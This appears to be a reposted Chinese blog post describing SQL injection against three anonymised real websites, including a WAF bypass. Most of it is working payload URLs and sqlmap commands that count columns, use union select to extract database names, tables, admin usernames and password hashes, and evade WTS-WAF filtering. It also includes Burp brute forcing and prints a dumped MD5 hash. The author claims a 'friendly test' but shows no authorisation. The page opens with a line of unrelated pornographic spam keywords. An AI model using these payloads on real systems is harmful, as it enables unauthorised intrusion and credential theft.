国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

這篇具有很好參考價(jià)值的文章主要介紹了SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

一鍵三連,sql注入

一次無(wú)意之間發(fā)現(xiàn)的sql注入,主要是因?yàn)橛幸粋€(gè)WTS-WAF,在此記錄一下

只是友好測(cè)試,并非有意為之。。。。

牛刀小試1

手注

判斷字段數(shù)

測(cè)試到order by 15的時(shí)候出現(xiàn)了報(bào)錯(cuò),那么就可以說(shuō)明字段數(shù)為14

http://www.xxx.com/xxx.php?id=22%20order%20by%2014

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

http://www.xxx.com/xxx.php?id=22%20order%20by%2015

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

直接注入

聯(lián)合注入直接上

判斷回顯位置
http://www.xxx.com/xxx.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

很多都可以,我這里直接用第二個(gè)位置

sql版本
http://www.xxx.com/xxx.php?id=-1%20union%20select%201,version(),3,4,5,6,7,8,9,10,11,12,13,14

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

當(dāng)前數(shù)據(jù)庫(kù)
http://www.xxx.com/xxx.php?id=-1%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13,14

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

當(dāng)前數(shù)據(jù)庫(kù)中的表
http://www.xxx.com/xxx.php?id=-1%20union%20select%201,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14%20from%20information_schema.tables%20where%20table_schema=database()

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

這里以表root為例:

爆字段
http://www.xxx.com/xxx.php?id=-1%20union%20select%201,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27root%27

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

查內(nèi)容
http://www.xxx.com/xxx.php?id=-1%20union%20select%201,group_concat(id,0x7e,username,0x7e,password,0x7e,status),3,4,5,6,7,8,9,10,11,12,13,14%20from%20root

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

root
8c7f5189069036869a4910ff15831772

都是基礎(chǔ)語(yǔ)法,連過(guò)濾都沒(méi)有

sqlmap一把梭

在判斷存在sql注入后,直接使用sqlmap一把梭

sqlmap -u "http://www.xxx.com/xxx.php?id=22" --batch --dbs

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

sqlmap -u "http://www.xxx.com/xxx.php?id=22" --batch -D svpy_com --tables

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

sqlmap -u "http://www.xxx.com/xxx.php?id=22" --batch -D svpy_com -T root --dump

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

牛刀小試2

步驟和上面差不多,直接測(cè)字段

測(cè)試回顯
http://www.xxx.com/xxx.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

數(shù)據(jù)庫(kù)信息
http://www.xxx.com.xxx.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,database(),18,19,20,21,22,23,24,25,26

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

手注,sqlmap一把梭都可以

繞過(guò)WTS-WAF的SQL注入

測(cè)試字段
http://www.xxx.com/xxx.php?id=22%20order%20by%2021

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

報(bào)錯(cuò)

直接告訴了sql語(yǔ)句,添加注釋符即可

并且在21的時(shí)候頁(yè)面和正常頁(yè)面差不多,但是到22的時(shí)候頁(yè)面就發(fā)生了變化

http://www.xxx.com/xxx.php?id=22%20order%20by%2022--%20-

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

然后判斷回顯位置

http://www.xxx.com/xxx.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20-

被waf攔截

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

百度就可找到繞過(guò)方式

這里將空格替換為+即可

然后判斷回顯位置
http://www.xxx.com/xxx.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20-

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

在第七個(gè)位置

當(dāng)前數(shù)據(jù)庫(kù)
http://www.xxx.com/xxx.php?id=-1+union+select+1,2,3,4,5,6,database(),8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20-
版本
http://www.xxx.com/xxx.php?id=-1+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20-

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

在獲取表的時(shí)候又被攔了

http://www.xxx.com/xxx.php?id=-1+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.tables+where+table_schema=database()--%20-

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

看樣子應(yīng)該是group_concat()的原因,這里使用limit一個(gè)一個(gè)查看

http://www.xxx.com/xxx.php?id=-1+union+select+1,2,3,4,5,6,table_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.tables+where+table_schema=database()+limit+0,1--%20-

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

bp抓包,給爆破一下

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

存在12個(gè)表

admin_authority,admin_login,admininfo,advanced,big_class,files,info,information,ip,message,sec_class,third_class

我在admin_login中并沒(méi)有發(fā)現(xiàn)密碼字段,于是選擇admininfo表,并且發(fā)現(xiàn)了passwd字段

http://www.xxx.com/xxx.php?id=-1+union+select+1,2,3,4,5,6,column_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.columns+where+table_name=%27admininfo%27+limit+0,1--%20-

bp爆破
username字段

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

passwd字段

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

查詢username

ttp://www.xxx.com/xxx.php?id=-1+union+select+1,2,3,4,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+admininfo+limit+0,1--%20-

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

查詢密碼

http://www.xxx.com/xxx.php?id=-1+union+select+1,2,3,4,5,6,passwd,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+admininfo+limit+0,1--%20-

SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF

找個(gè)md5平臺(tái)進(jìn)行解密即可

這個(gè)網(wǎng)站主要的困難就是需要繞WAF,通常想這類的WAF在百度搜一搜都會(huì)有相關(guān)的繞過(guò)方式的。

如有錯(cuò)誤和侵權(quán),請(qǐng)聯(lián)系刪除?。?!文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-471857.html

到了這里,關(guān)于SQL注入三連實(shí)戰(zhàn)繞過(guò)WTS-WAF的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • WAF繞過(guò)漏洞利用——漏洞利用之注入上傳跨站等繞過(guò)

    目錄 前言: (一)SQL注入 0x01? sqlmap注入 修改user-agent頭: (二)文件上傳

    2024年02月12日
    瀏覽(21)
  • 【第二十三篇】Burpsuite+SQL注入實(shí)現(xiàn)登錄繞過(guò)等(靶場(chǎng)實(shí)戰(zhàn)案例)

    存在一個(gè)業(yè)務(wù)場(chǎng)景如下 篩選商品時(shí),后端查詢語(yǔ)句如下: 只有商品名匹配且該商品已發(fā)布(released=1),客戶端才能回顯數(shù)據(jù)。 點(diǎn)擊Lifestyle時(shí),頁(yè)面回顯 生活方式 有關(guān)商品,并可知參數(shù)以GET方

    2024年04月10日
    瀏覽(30)
  • 【W(wǎng)AF剖析】——SQL注入之安全狗bypass深度剖析

    【W(wǎng)AF剖析】——SQL注入之安全狗bypass深度剖析

    作者名:Demo不是emo? 主頁(yè)面鏈接:主頁(yè)傳送門 創(chuàng)作初心: 舞臺(tái)再大,你不上臺(tái),永遠(yuǎn)是觀眾,沒(méi)人會(huì)關(guān)心你努不努力,摔的痛不痛,他們只會(huì)看你最后站在什么位置,然后羨慕或鄙夷 座右銘: 不要讓時(shí)代的悲哀成為你的悲哀 專研方向: 網(wǎng)絡(luò)安全,數(shù)據(jù)結(jié)構(gòu) 每日emo: 保持

    2024年02月03日
    瀏覽(24)
  • SQL注入繞過(guò)安全狗

    SQL注入繞過(guò)安全狗

    如果程序中設(shè)置了過(guò)濾,但是程序只是對(duì) and ,AND 或者 or,OR 設(shè)置了過(guò)濾,那么你就可以使用大小寫過(guò)濾 例如 :and,or 當(dāng)然不局限于 and,其它的例如 union 一些如果只是設(shè)置了過(guò)濾,沒(méi)有進(jìn)行深度過(guò)濾的話,都是可以使用大小寫過(guò)濾的 union 設(shè)置了過(guò)濾

    2024年02月15日
    瀏覽(23)
  • SQL注入---字符繞過(guò)

    SQL注入---字符繞過(guò)

    文章目錄 前言 一、pandas是什么? 二、使用步驟 1.引入庫(kù) 2.讀入數(shù)據(jù) 總結(jié) 當(dāng)網(wǎng)頁(yè)源代碼中出現(xiàn)如下代碼后,常見(jiàn)的注釋符號(hào)將無(wú)效,因此需要通過(guò)特殊手段進(jìn)行繞過(guò) 上述代碼中無(wú)法使用符號(hào)(#)或(--+)將后面的sql語(yǔ)句注釋,因此需要通過(guò)特殊手段將后面多出的單引號(hào)閉合

    2024年04月11日
    瀏覽(23)
  • 安全狗SQL注入繞過(guò)

    安全狗SQL注入繞過(guò)

    本文用sqli-labs第一關(guān)為例 一、簡(jiǎn)單注入 開啟安全狗后嘗試正常注入,發(fā)送請(qǐng)求后可以看到被安全狗攔截了 尋找被安全狗匹配的特征字符,這里沒(méi)被攔截 原來(lái)是當(dāng)and 與 xx=xx 同時(shí)出現(xiàn)的時(shí)候會(huì)被安全狗識(shí)別 1.1 簡(jiǎn)單注入繞過(guò)方式 這里可以使用mysql的內(nèi)聯(lián)注釋來(lái)進(jìn)行繞過(guò) 內(nèi)聯(lián)注

    2024年02月08日
    瀏覽(17)
  • 生命在于學(xué)習(xí)——SQL注入繞過(guò)

    生命在于學(xué)習(xí)——SQL注入繞過(guò)

    SQL注入繞過(guò)技術(shù)已經(jīng)是一個(gè)老生常淡的內(nèi)容了,防注入可以使用某些云waf加速樂(lè)等安全產(chǎn)品,這些產(chǎn)品會(huì)自帶waf屬性攔截和抵御SQL注入,也有一些產(chǎn)品會(huì)在服務(wù)器里安裝軟件,例如iis安全狗、d盾、還有就是在程序理論對(duì)輸入?yún)?shù)進(jìn)行過(guò)濾和攔截,例如360webscan腳本等只要參數(shù)

    2023年04月08日
    瀏覽(16)
  • Web安全之SQL注入繞過(guò)技巧

    Web安全之SQL注入繞過(guò)技巧

    兩個(gè)空格代替一個(gè)空格,用Tab代替空格,%a0=空格: ??最基本的繞過(guò)方法,用注釋替換空格: 使用浮點(diǎn)數(shù): 如果空格被過(guò)濾,括號(hào)沒(méi)有被過(guò)濾,可以用括號(hào)繞過(guò)。 在MySQL中,括號(hào)是用來(lái)包圍子查詢的。因此,任何可以計(jì)算出結(jié)果的語(yǔ)句,都可以用括號(hào)包圍起來(lái)。而括號(hào)的兩

    2024年02月07日
    瀏覽(25)
  • sql注入(三)繞過(guò)方法及防御手段

    sql注入(三)繞過(guò)方法及防御手段

    常用的注釋符有: 1)-- 注釋內(nèi)容 2)# 注釋內(nèi)容 3)/* 注釋內(nèi)容 */ 繞過(guò)方法 構(gòu)造閉合: 這樣接收源碼前面的引號(hào)被 id=1\\\' 中的后引號(hào)所閉合,源碼中的后引號(hào)會(huì)被 \\\'1\\\'=\\\'1 中的前引號(hào)所閉合所以這樣不用注釋符就逃逸出引號(hào)。 常用于 waf 的正則對(duì)大小寫不敏感的情況。 當(dāng)一些關(guān)

    2024年02月02日
    瀏覽(21)
  • iwebsec靶場(chǎng) SQL注入漏洞通關(guān)筆記11-16進(jìn)制編碼繞過(guò)

    iwebsec靶場(chǎng) SQL注入漏洞通關(guān)筆記11-16進(jìn)制編碼繞過(guò)

    iwebsec靶場(chǎng) SQL注入漏洞通關(guān)筆記1- 數(shù)字型注入_mooyuan的博客-CSDN博客 iwebsec靶場(chǎng) SQL注入漏洞通關(guān)筆記2- 字符型注入(寬字節(jié)注入)_mooyuan的博客-CSDN博客 iwebsec靶場(chǎng) SQL注入漏洞通關(guān)筆記3- bool注入(布爾型盲注)_mooyuan的博客-CSDN博客 iwebsec靶場(chǎng) SQL注入漏洞通關(guān)筆記4- sleep注入(時(shí)

    2023年04月24日
    瀏覽(16)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包